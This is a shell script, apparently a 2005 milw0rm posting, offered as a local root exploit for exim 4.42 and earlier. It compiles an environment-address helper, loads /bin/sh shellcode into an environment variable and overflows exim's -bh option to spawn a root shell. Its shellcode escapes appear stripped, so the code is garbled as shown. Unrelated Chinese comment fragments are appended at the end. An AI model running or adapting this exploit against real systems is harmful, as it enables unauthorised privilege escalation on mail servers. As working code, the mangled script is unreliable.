#!/bin/sh
# Local Lame R00T sploit for exim <= 4.42
# by Dark Eagle
#
# My First Coding Release In bash ))
# Unl0ck Research Team
#
# More Effective than C-code.
#
# @env.c content:
#
###################################################
# #include <stdio.h>
# #include <string.h>
# int main(int argc, char *argv[])
# {
# char *addr_ptr;
# addr_ptr = getenv(argv[1]);
# printf("%s @ %pn", argv[1], addr_ptr);
# return 0;
# }
###################################################
gcc @env.c -o @env
cp @env /usr/bin
cd /usr/exim/bin
CODE=`perl -e 'print "x31xc0x31xdbxb0x17xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69
x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80"'`;export CODE
@env CODE
echo "So, dude, starting..."
echo "NoW Just Type Address Of CODE"
read ADDRESS
echo "You are typed: $ADDRESS"
echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"
./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`
# milw0rm.com [2005-02-07]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666